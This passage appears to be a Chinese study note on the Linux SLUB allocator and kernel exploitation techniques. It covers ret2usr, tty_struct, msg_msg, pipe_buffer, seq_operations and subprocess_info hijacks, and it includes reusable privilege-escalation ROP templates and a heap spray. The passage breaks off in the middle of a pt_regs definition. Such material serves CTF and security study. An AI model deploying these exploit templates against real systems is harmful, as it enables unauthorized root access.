slab 算法在伙伴算法的基础上,对小内存的场景专门做了优化,采用了内存池的方案,解决内部碎片问题

先挂一张图片:

从 buddy 分配出来的那一份份连续的 page 就是一个 slab

  • 首先我们要知道是 slab 分配器是基于 buddy 分配器的,即 slab 需要从 buddy 分配器获取连续的物理页帧作为制造对象的原材料
  • 简单来说,就是基于 buddy 分配器获得连续的 pages,作为某数据结构对象的缓存,再将这段连续的 pages 从内部切割成一个个对齐的对象,使用时从中取用,这样一段连续的 page 我们称为一个 slab

把各个 slab 分组管理,每一个组对应一个 kmem_cache,对应一种分配“规则”

  • 在 slab 算法中维护着大小不同的 slab 集合,在最顶层是 cache_chain,cache_chain 中维护着一组 kmem_cache 引用
  • kmem_cache 负责管理一块固定大小的对象池,通常会提前分配一块内存,然后将这块内存划分为大小相同的 object(分配给用户的对象),不会对内存块再进行合并,同时使用位图 bitmap 记录每个 object 的使用情况
  • 把各个 slab 进行分组管理,每个组分别包含 2^3,2^4,2^5 … 2^11 … 个字节(在 4K 页大小的默认情况下),另外还有两个特殊的组,分别是 96B 和 192B,每个组就是一个 kmem_cache
  • 不同内核版本的分组数不同(大约20个),比如我的内核就分配了26个组:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
static __always_inline unsigned int kmalloc_index(size_t size)
{
if (!size)
return 0;

if (size <= KMALLOC_MIN_SIZE)
return KMALLOC_SHIFT_LOW;

if (KMALLOC_MIN_SIZE <= 32 && size > 64 && size <= 96)
return 1;
if (KMALLOC_MIN_SIZE <= 64 && size > 128 && size <= 192)
return 2;
if (size <= 8) return 3;
if (size <= 16) return 4;
if (size <= 32) return 5;
if (size <= 64) return 6;
if (size <= 128) return 7;
if (size <= 256) return 8;
if (size <= 512) return 9;
if (size <= 1024) return 10;
if (size <= 2 * 1024) return 11;
if (size <= 4 * 1024) return 12;
if (size <= 8 * 1024) return 13;
if (size <= 16 * 1024) return 14;
if (size <= 32 * 1024) return 15;
if (size <= 64 * 1024) return 16;
if (size <= 128 * 1024) return 17;
if (size <= 256 * 1024) return 18;
if (size <= 512 * 1024) return 19;
if (size <= 1024 * 1024) return 20;
if (size <= 2 * 1024 * 1024) return 21;
if (size <= 4 * 1024 * 1024) return 22;
if (size <= 8 * 1024 * 1024) return 23;
if (size <= 16 * 1024 * 1024) return 24;
if (size <= 32 * 1024 * 1024) return 25;
if (size <= 64 * 1024 * 1024) return 26;
BUG();

return -1;
}
  • slab 分配器并非一开始就能智能的根据内存分档值分配相应长度的内存的,它需要先创建一个这样的“规则”式的东西,之后才可以根据这个“规则”分配相应长度的内存
  • 内核 slab 分配器之所以能够默认的提供26种内存长度分档,肯定也需要创建这样26个“规则”,这是由函数 kmem_cache_init 在初始化时创建的
  • 比如现在有一个内核模块想要申请一种它自创的结构,这个结构是111字节,并且它不想获取128字节内存就想获取111字节长度内存,那么它需要在 slab 分配器中创建一个这样的“规则”,这个规则规定 slab 分配器当按这种“规则”分配时要给我111字节的内存,这个“规则”的创建方法就是调用函数 kmem_cache_create
  • 函数 kmem_cache_destroy 可以销毁 kmem_cache_create 创建的“规则”,而这个“规则”就是“缓存描述符 kmem_cache”

slub接口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* 分配一块给某个数据结构使用的kmem_cache(缓存描述符) */
struct kmem_cache *kmem_cache_create( const char *name, size_t size, size_t align, unsigned long flags, void (*ctor)(void*));

/* 销毁kmem_cache_create分配的kmem_cache */
int kmem_cache_destroy(struct kmem_cache *cachep);

/* 从目标kmem_cache中分配一个object */
void* kmem_cache_alloc(struct kmem_cache* cachep, gfp_t flags);

/* 释放object,把它返还给原先的kmem_cache */
void kmem_cache_free(struct kmem_cache* cachep, void* objp);

/* 输入想要的size,分配一个object,其他工作交给伙伴系统和slub */
void *kmalloc(size_t size, int flags);

/* 输入目标obj,释放它,其他工作交给伙伴系统和slub */
void kfree(const void *objp)
  • 先通过 kmem_cache_create 创建一个缓存管理描述符 kmem_cache
  • 使用 kmem_cache_alloc 从缓存 kmem_cache 中申请 object 使用
  • 函数 kmem_cache_init 在初始化时会自动创建默认的 kmem_cache

kmalloc

kmalloc 本质上是调用 __kmalloc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* linux-4.20.1\mm\slub.c */
void *__kmalloc(size_t size, gfp_t flags)
{
struct kmem_cache *s;
void *ret;

if (unlikely(size > KMALLOC_MAX_CACHE_SIZE))
return kmalloc_large(size, flags);

s = kmalloc_slab(size, flags);

if (unlikely(ZERO_OR_NULL_PTR(s)))
return s;

ret = slab_alloc(s, flags, _RET_IP_); /* 从对应的kmem_cache中分配对象 */

trace_kmalloc(_RET_IP_, ret, size, s->size, flags);

kasan_kmalloc(s, ret, size, flags);

return ret;
}
EXPORT_SYMBOL(__kmalloc);
  • kmalloc() 先根据 size 找到对应的 struct kmem_cache 然后调用 slab_alloc() 从中分配对象

slab_alloc:

1
2
3
4
5
6
/* linux-4.20.1\mm\slub.c */
static __always_inline void *slab_alloc(struct kmem_cache *s,
gfp_t gfpflags, unsigned long addr)
{
return slab_alloc_node(s, gfpflags, NUMA_NO_NODE, addr);
}
  • 然后在 slab_alloc() 中调用 slab_alloc_node

slab_alloc_node:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
static __always_inline void *slab_alloc_node(struct kmem_cache *s,
gfp_t gfpflags, int node, unsigned long addr)
{
void *object;
struct kmem_cache_cpu *c;
struct page *page;
unsigned long tid;

s = slab_pre_alloc_hook(s, gfpflags);
if (!s)
return NULL;
redo:
/*
必须通过本cpu指针去读kmem_cache中的cpu相关数据,
当读一个CPU区域内的数据时有可能在cpu直接来回切换
只要我们在执行cmpxchg时再次使用原始 cpu,这并不重要

必须保证tid和kmem_cache都是通过同一个CPU获取的
如果开启了CONFIG_PREEMPT(内核抢占), 那么有可能获取tid之后被换出, 导致tid与c不对应, 所以这里需要一个检查
*/
do {
tid = this_cpu_read(s->cpu_slab->tid);
c = raw_cpu_ptr(s->cpu_slab);
} while (IS_ENABLED(CONFIG_PREEMPT) &&
unlikely(tid != READ_ONCE(c->tid)));

barrier(); // 编译屏障, 防止指令乱序

object = c->freelist; // 获取空闲链表中的对象
page = c->page; // 正在被用来分配对象的页
if (unlikely(!object || !node_match(page, node))) {
/* 如果空闲链表为空或者page不属于要求的节点,那么就进入slowpath部分 */
object = __slab_alloc(s, gfpflags, node, addr, c);
stat(s, ALLOC_SLOWPATH);
} else {
/* 否则进入fastpath,通过CPU缓存中的freelist进行分配 */
void *next_object = get_freepointer_safe(s, object);

/*这里要执行链表的取出操作, this_cpu_cmpxchg_double()作用为:
如果s->cpu_slab->freelist==object, 那么s->cpu_slab->freelist=next_object
如果s->cpu_slab->tid==tid, 那么s->cpu_slab->tid=next_tid(tid), next_tid(tid)
如果执行到一半s->cpu_slab被其他slub拿去使用, 那么compare失败, 不执行写入, 返回redo重新试一下
*/
if (unlikely(!this_cpu_cmpxchg_double(
s->cpu_slab->freelist, s->cpu_slab->tid,
object, tid,
next_object, next_tid(tid)))) { // next_tid(tid)相当于tid+1

note_cmpxchg_failure("slab_alloc", s, tid);
goto redo;
}
prefetch_freepointer(s, next_object); // 把预读进缓存
stat(s, ALLOC_FASTPATH); // 记录状态
}

if (unlikely(gfpflags & __GFP_ZERO) && object) // 如果flag要求清0
memset(object, 0, s->object_size);

slab_post_alloc_hook(s, gfpflags, 1, &object); // 空操作

return object;
}
  • 这里我们主要考虑 fastpath,也就是使用 freelist 的这种情况

get_freepointer_safe:

1
2
3
4
5
6
7
8
9
10
11
12
13
static inline void *get_freepointer_safe(struct kmem_cache *s, void *object)
{
unsigned long freepointer_addr;
void *p;

if (!debug_pagealloc_enabled()) /* 如果没开启CONFIG_DEBUG_PAGEALLOC,那么就会进入get_freepointer() */
return get_freepointer(s, object);

/* 否则就会进行加密 */
freepointer_addr = (unsigned long)object + s->offset;
probe_kernel_read(&p, (void **)freepointer_addr, sizeof(p));
return freelist_ptr(s, p, freepointer_addr);
}
  • 这就是 Harden_freelist 保护(使用 s->random指针所在地址 去加密原空闲指针)
  • 加固指针 = 空闲指针 ^ 空闲指针地址 ^ 随机数R,只要知道这些值就可以绕过 Harden_freelist

ret2usr

核心:利用 commit_creds(prepare_kernel_cred(0)) 进行提取

原理:该方式会自动生成一个合法的 cred,并定位当前线程的 task_struct 的位置,然后修改它的 cred 为新的 cred

当已知 commit_creds 和 prepare_kernel_cred 的函数地址时,用如下代码进行提权:

1
2
3
4
5
6
void get_root() 
{
char* (*pkc)(int) = prepare_kernel_cred;
void (*cc)(char*) = commit_creds;
(*cc)((*pkc)(0));
}
  • 注意:“prepare_kernel_cred”和“commit_creds”都是地址,需要用函数指针执行

对于这两个函数的地址,可以在 “/proc/kallsyms-内核符号表” 中找到,提供以下脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

size_t commit_creds = 0;
size_t prepare_kernel_cred = 0;

size_t find_symbols() /* 收集必要信息 */
{
FILE* kallsyms_fd = fopen("/proc/kallsyms", "r");

if(kallsyms_fd < 0)
{
puts("[*]open kallsyms error!");
exit(0);
}

char buf[0x30] = {0};
while(fgets(buf, 0x30, kallsyms_fd))
{
if(commit_creds & prepare_kernel_cred)
return 0;

if(strstr(buf, "commit_creds") && !commit_creds)
{
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &commit_creds);
printf("commit_creds addr: %p\n", commit_creds);
}

if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
{
char hex[20] = {0};
strncpy(hex, buf, 16);
sscanf(hex, "%llx", &prepare_kernel_cred);
printf("prepare_kernel_cred addr: %p\n", prepare_kernel_cred);
}
}

if(!(prepare_kernel_cred & commit_creds))
{
puts("[*]Error!");
exit(0);
}
}
  • 注意:如果在 init 文件中看到如下代码,就不能通过 /proc/kallsyms 查看函数地址了
1
echo 1 > /proc/sys/kernel/kptr_restrict # 设置kptr_restrict为'1'

如果开启了 smep,则需要使用 mov cr4, 0x1407e0 关闭 smep

tty_struct attack

open("/dev/ptmx", O_RDWR) 时会分配这样一个结构体:tty_struct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
/* size:0x2e0(kmalloc-0x400) */
struct tty_struct {
int magic;
struct kref kref;
struct device *dev;
struct tty_driver *driver;
const struct tty_operations *ops;
int index;
/* Protects ldisc changes: Lock tty not pty */
struct ld_semaphore ldisc_sem;
struct tty_ldisc *ldisc;
struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
spinlock_t ctrl_lock;
spinlock_t flow_lock;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
struct termiox *termiox; /* May be NULL for unsupported */
char name[64];
struct pid *pgrp; /* Protected by ctrl lock */
struct pid *session;
unsigned long flags;
int count;
struct winsize winsize; /* winsize_mutex */
unsigned long stopped:1, /* flow_lock */
flow_stopped:1,
unused:BITS_PER_LONG - 2;
int hw_stopped;
unsigned long ctrl_status:8, /* ctrl_lock */
packet:1,
unused_ctrl:BITS_PER_LONG - 9;
unsigned int receive_room; /* Bytes free for queue */
int flow_change;
struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock; /* protects tty_files list */
struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work;
struct tty_port *port;
} __randomize_layout;
  • ops:指向 ptm_unix98_ops,因此它可能会泄漏(可以绕过 Kaslr)
  • ops:可以覆写执行任意函数

另一个很有趣的结构体:tty_operationstty_struct[4]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;
  • 全是函数指针,每一个都可以用来劫持
  • 劫持过后,就可以通过调用对应的函数来执行我们想要的代码了

conditional competition

条件竞争就是两个或者多个进程或者线程同时处理一个资源(全局变量,文件)产生非预想的执行效果,从而产生程序执行流的改变,从而达到攻击的目的

条件竞争需要如下的条件:

  • 并发,即至少存在两个并发执行流:
    • 这里的执行流包括线程,进程,任务等级别的执行流
  • 共享对象,即多个并发流会访问同一对象:
    • 常见的共享对象有共享内存,文件系统,信号,一般来说,这些共享对象是用来使得多个程序执行流相互交流
    • 此外,我们称访问共享对象的代码为临界区,在正常写代码时,这部分应该加锁
  • 改变对象,即至少有一个控制流会改变竞争对象的状态:因为如果程序只是对对象进行读操作,那么并不会产生条件竞争

案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <unistd.h>
#include <pthread.h>
#include <stdio.h>

int counter;
void* IncreaseCounter(void* args) {
counter += 1;
sleep(0.1);
printf("Thread %d has counter value %d\n", (unsigned int)pthread_self(), counter);
}

int main() {
pthread_t p[10];
for (int i = 0; i < 10; ++i) {
pthread_create(&p[i], NULL, IncreaseCounter, NULL);
}
for (int i = 0; i < 10; ++i) {
pthread_join(p[i], NULL);
}
return 0;
}

创建10个线程,常理说应该线程应该按从小到大的顺序输出相应顺序的数字,但是由于 counter 是全局共享的资源,在 race window 的间隙里面可能多个线程对 counter 进行写、读操作,导致输出结果很难预料,如下: (多次尝试的结果还不同)

1
2
3
4
5
6
7
8
9
10
11
12
exp gcc test.c -o test -pthread
exp ./test
Thread -967665920 has counter value 10
Thread -1043200256 has counter value 10
Thread -1034807552 has counter value 10
Thread -976058624 has counter value 10
Thread -1026414848 has counter value 10
Thread -984451328 has counter value 10
Thread -992844032 has counter value 10
Thread -1009629440 has counter value 10
Thread -1001236736 has counter value 10
Thread -1018022144 has counter value 10
1
2
3
4
5
6
7
8
9
10
11
exp ./test
Thread 1636828928 has counter value 5
Thread 1586472704 has counter value 10
Thread 1594865408 has counter value 10
Thread 1603258112 has counter value 10
Thread 1569687296 has counter value 10
Thread 1578080000 has counter value 10
Thread 1628436224 has counter value 5
Thread 1645221632 has counter value 5
Thread 1611650816 has counter value 6
Thread 1620043520 has counter value 8

pipe trick

pipe 的读和写没有专门的函数,直接使用 write 和 read 操作之前 pipe 返回的文件描述符即可,pipefd[1] 用来写,pipefd[0] 用来读

结构体如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
struct pipe_inode_info {
wait_queue_head_t wait; /* 等待队列,用于存储正在等待管道可读或者可写的进程 */
unsigned int nrbufs; /* 表示未读数据已经占用了环形缓冲区的多少个内存页 */
unsigned int curbuf; /* 表示当前正在读取环形缓冲区的哪个内存页中的数据 */
...
unsigned int readers; /* 表示正在读取管道的进程数 */
unsigned int writers; /* 表示正在写入管道的进程数 */
unsigned int waiting_writers; /* 表示等待管道可写的进程数 */
...
struct inode *inode; /* 与管道关联的inode对象 */
struct pipe_buffer bufs[16]; /* 管道缓冲区 */
};

struct pipe_buffer {
struct page *page; /* 指向包含管道缓冲区数据的页面 */
unsigned int offset, len; /* 页面内数据的偏移量,长度 */
const struct pipe_buf_operations *ops; /* 与此缓冲区关联的操作 */
unsigned int flags; /* 管道缓冲区标志 */
unsigned long private; /* 运维人员拥有的私有数据 */
};

关于这个 pipe_buffer,有个小 trick:

  • 使用 write(pfd[1],buf,0x100),就是使用管道传输信息
    • write(pfd[1],buf,0x100) 执行之前,offset = 0,len = 0
    • write(pfd[1],buf,0x100) 执行之后,offset = 0,len = 0x100
  • offset 和 len 都是4字节数据,如果把它们拼在一起,凑成8字节,就是 0x10000000000
  • 如果我们用 UAF,使其 pipe_buffer 和另一个结构体重合,那么该结构体对应位置也会变为 0x10000000000
  • 如果该结构体与内存管理有关,并且该位表示 size 的话,就可以造成堆溢出

subprocess_info attack

使用以下语句:

1
socket(22, AF_INET, 0);

会触发 struct subprocess_info 这个对象的分配,此结构为0x60大小,定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* size:0x60(kmalloc-128) */
struct subprocess_info {
struct work_struct work;
struct completion *complete;
const char *path;
char **argv;
char **envp;
struct file *file;
int wait;
int retval;
pid_t pid;
int (*init)(struct subprocess_info *info, struct cred *new);
void (*cleanup)(struct subprocess_info *info);
void *data;
} __randomize_layout;
  • work.func:指向 call_usermodehelper_exec_work,可以泄露内核地址
  • cleanup:条件竞争控制这里可以执行任意函数

此对象在分配时最终会调用 cleanup 函数,如果我们能在分配过程中把 cleanup 指针劫持为我们的 gadget,就能控制RIP,劫持的方法显而易见,即条件竞争

模板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
void *race(void *arg) 
{
unsigned long *info = (unsigned long*)arg;
info[0] = (u_int64_t)xchg_eax_esp;

u_int64_t hijacked_stack_addr = ((u_int64_t)xchg_eax_esp & 0xffffffff);
printf("[+] hijacked_stack: %p\n", (char *)hijacked_stack_addr);

char* fake_stack = NULL;
if((fake_stack = mmap((char*)((hijacked_stack_addr & (~0xfff))),0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)) == MAP_FAILED)
perror("mmap");
printf("[+] fake_stack addr: %p\n", fake_stack);

fake_stack[0]=0;
u_int64_t* hijacked_stack_ptr = (u_int64_t*)hijacked_stack_addr;
int index = 0;
hijacked_stack_ptr[index++] = pop_rdi;
hijacked_stack_ptr[index++] = 0;
hijacked_stack_ptr[index++] = prepare_kernel_cred;
hijacked_stack_ptr[index++] = mov_rdi_rax_je_pop_pop_ret;
hijacked_stack_ptr[index++] = 0;
hijacked_stack_ptr[index++] = 0;
hijacked_stack_ptr[index++] = commit_creds;
hijacked_stack_ptr[index++] = swapgs;
hijacked_stack_ptr[index++] = iretq;
hijacked_stack_ptr[index++] = (u_int64_t)getshell;
hijacked_stack_ptr[index++] = user_cs;
hijacked_stack_ptr[index++] = user_rflags;
hijacked_stack_ptr[index++] = user_rsp;
hijacked_stack_ptr[index++] = user_ss;
while(1) {
write(fd, (void*)info,0x20);
if (race_flag) break;
}
return NULL;
}
  • 这些 gadget 都可以通过 ropper 来找
  • commit_creds,prepare_kernel_cred 可以通过 grep <symbol_name> /proc/kallsyms 来找(记得开 root,关闭 kernel ASLR)
  • 而 user_cs 这些寄存器的值,可以通过 save_status 来获取

msg_msg leak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/* size:0x28(kmalloc-*) */
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security; /* the actual message follows immediately */
};

struct msg_queue {
struct kern_ipc_perm q_perm;
time64_t q_stime; /* last msgsnd time */
time64_t q_rtime; /* last msgrcv time */
time64_t q_ctime; /* last change time */
unsigned long q_cbytes; /* current number of bytes on queue */
unsigned long q_qnum; /* number of messages in queue */
unsigned long q_qbytes; /* max number of bytes on queue */
struct pid *q_lspid; /* pid of last msgsnd */
struct pid *q_lrpid; /* last receive pid */

struct list_head q_messages;
struct list_head q_receivers;
struct list_head q_senders;
} __randomize_layout;

当我们在一个消息队列上发送多个消息时,会形成如下结构:(msg 双向链表)

  • 去除掉 msg_msg 结构体本身的 0x30 字节的部分(或许可以称之为 header)剩余的部分都用来存放用户数据
  • 因此内核分配的 object 的大小是跟随着我们发送的 message 的大小进行变动的

而当我们单次发送大于 [一个页面大小 - header size] 大小的消息时,内核会额外补充添加 msg_msgseg 结构体(只有一个 next 指针),其与 msg_msg 之间形成如下单向链表结构:

  • 同样地,单个 msg_msgseg 的大小最大为一个页面大小,因此超出这个范围的消息内核会额外补充上更多的 msg_msgseg 结构体
  • 在读取 msg_msg 中的数据时,如果 msg_msg->next 不为空,程序就会把 msg_msg->next 指向的内容也当做是 msg_msg data 的一部分,如果 msg_msgseg->next 还不为空,就会继续读取 msg_msgseg->next 指向的内容

利用-内核地址泄露:

  • 在拷贝数据时对长度的判断主要依靠的是 msg_msg->m_ts,若是我们能够控制一个 msg_msg 的 header,将其 msg_msg->m_ts 成员改为一个较大的数,我们就能够越界读取出最多将近一张内存页大小的数据
  • 若是我们能够同时劫持 msg_msg->m_tsmsg_msg->next,我们便能够完成内核空间中的任意地址读(msg_msg->next 指向的数据也会被当做 msg_msg data
    • 但这个方法有一个缺陷,无论是 MSG_COPY 还是常规的接收消息,其拷贝消息的过程的判断主要依据还是单向链表的 next 指针,因此若我们需要完成对特定地址向后的一块区域的读取,我们需要保证该地址的数据为 NULL

相关接口:

1
2
3
4
5
6
7
8
9
10
11
// 创建和获取ipc内核对象
int msgget(key_t key, int flags);

// 将消息发送到消息队列
int msgsnd(int msqid, const void *msgp, size_t msgsz, int msgflg);

// 从消息队列获取消息
ssize_t msgrcv(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg);

// 查看、设置、删除ipc内核对象(用法和shmctl一样)
int msgctl(int msqid, int cmd, struct msqid_ds *buf);
  • msqid:消息队列的标识符,代表要从哪个消息列中获取消息
  • msgp: 存放消息结构体的地址(需要自己定义:long type+char data[n]
  • msgsz:消息正文的字节数
  • msgtyp:消息的类型,可以有以下几种类型:
    • msgtyp = 0:返回队列中的第一个消息
    • msgtyp > 0:返回队列中消息类型为 msgtyp 的消息(常用)
    • msgtyp < 0:返回队列中消息类型值小于或等于 msgtyp 绝对值的消息,如果这种消息有若干个,则取类型值最小的消息
  • msgflg:函数的控制属性,其取值如下:
    • 0:msgrcv() 调用阻塞直到接收消息成功为止
    • MSG_NOERROR:若返回的消息字节数比 nbytes 字节数多,则消息就会截短到 nbytes 字节,且不通知消息发送进程
    • MSG_COPY:读取但不释放,当我们在调用 msgrcv 接收消息时,相应的 msg_msg 链表便会被释放,当我们在调用 msgrcv 时若设置了 MSG_COPY 标志位,则内核会将 message 拷贝一份后再拷贝到用户空间,原双向链表中的 message 并不会被 unlink
    • IPC_NOWAIT:调用进程会立即返回,若没有收到消息则立即返回 -1

PS:msg_msg 常常和 sk_buff 进行连用

pipe_buffer leak+attack

pipe_buffer leak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* size:0x28*0x10(kmalloc-0x400) */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};
  • 当我们创建一个管道时,在内核中会生成数个连续的 pipe_buffer 结构体,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object
  • pipe_buffer 中存在一个函数表成员 pipe_buf_operations ,其指向内核中的函数表 anon_pipe_buf_ops,若我们能够将其读出,便能泄露出内核基址

pipe_buffer attack

当我们关闭了管道的两端时,会触发 pipe_buffer->pipe_buf_operations->release 这一指针,可以把它覆盖为 shellcode

参考模板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg;
pipe_buf_ptr->page = *(uint64_t*) "yhellow";
pipe_buf_ptr->ops = victim_addr + 0x100;

ops_ptr = (struct pipe_buf_operations *) &fake_secondary_msg[0x100]; /* 伪造的pipe_buf_operations */
ops_ptr->release = PUSH_RSI_POP_RSP_POP_4VAL_RET + kernel_offset; /* 伪造的pipe_buf_operations->release */

rop_idx = 0;
rop_chain = (uint64_t*) &fake_secondary_msg[0x20];
rop_chain[rop_idx++] = kernel_offset + POP_RDI_RET;
rop_chain[rop_idx++] = kernel_offset + INIT_CRED;
rop_chain[rop_idx++] = kernel_offset + COMMIT_CREDS;
rop_chain[rop_idx++] = kernel_offset + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE + 22;
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = *(uint64_t*) "yhellow";
rop_chain[rop_idx++] = getRootShell;
rop_chain[rop_idx++] = user_cs;
rop_chain[rop_idx++] = user_rflags;
rop_chain[rop_idx++] = user_sp;
rop_chain[rop_idx++] = user_ss;

if (spraySkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
errExit("failed to spray sk_buff!");

printf("[*] gadget: %p\n", kernel_offset + PUSH_RSI_POP_RSP_POP_4VAL_RET);
printf("[*] free_pipe_info: %p\n", kernel_offset + FREE_PIPE_INFO);
sleep(5);

for (int i = 0; i < PIPE_NUM; i++)
{
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

shm_file_data leak+attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/* size:0x20(kmalloc-32) */
struct shm_file_data {
int id;
struct ipc_namespace *ns;
struct file *file;
const struct vm_operations_struct *vm_ops;
};
#define shm_file_data(file) (*((struct shm_file_data **)&(file)->private_data))

static const struct vm_operations_struct shm_vm_ops = {
.open = shm_open, /* callback for a new vm-area open */
.close = shm_close, /* callback for when the vm-area is released */
.fault = shm_fault,
.split = shm_split,
.pagesize = shm_pagesize,
#if defined(CONFIG_NUMA)
.set_policy = shm_set_policy,
.get_policy = shm_get_policy,
#endif
};
  • ns,vm_ops:指向内核数据区域,因此可能发生泄漏(可以绕过 Kaslr)
  • file:文件指向堆区域,因此可能会泄漏 kernel_heapbase
  • vm_ops:可以覆写这里,但在特殊情况下,shmget 不会调用伪造的 vtable 函数指针

shmget:用于 Linux 进程通信(IPC)共享内存,共享内存函数由 shmget、shmat、shmdt、shmctl 四个函数组成

使用案例:

1
2
3
4
5
6
7
8
9
10
int shmid;
if ((shmid = shmget(IPC_PRIVATE, 100, 0600)) == -1) {
perror("shmget");
return 1;
}
char *shmaddr = shmat(shmid, NULL, 0);
if (shmaddr == (void*)-1) {
perror("shmat");
return 1;
}

seq_operations leak+attack

1
2
3
4
5
6
7
/* size:0x20(kmalloc-32) */
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
  • start,stop,next,show:这4个函数都可以泄露 kernel_base
  • start:重写 start 变量并调用 read,就可以成功控制 rip

当我们 read 一个 stat 文件时,内核会调用 proc_ops->proc_read_iter 指针

使用案例:

1
2
int victim = open("/proc/self/stat", O_RDONLY);
read(victim, buf, 1); // call start

pt_regs + seq_operations Bypass KPTI

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
struct pt_regs {
/*
* C ABI says these regs are callee-preserved. They aren't saved on kernel entry
* unless syscall needs a complete, fully filled "struct pt_regs".
*/
unsigned long r15;
unsigned long r14;
unsigned long r13;
unsigned long r12;
unsigned long rbp;
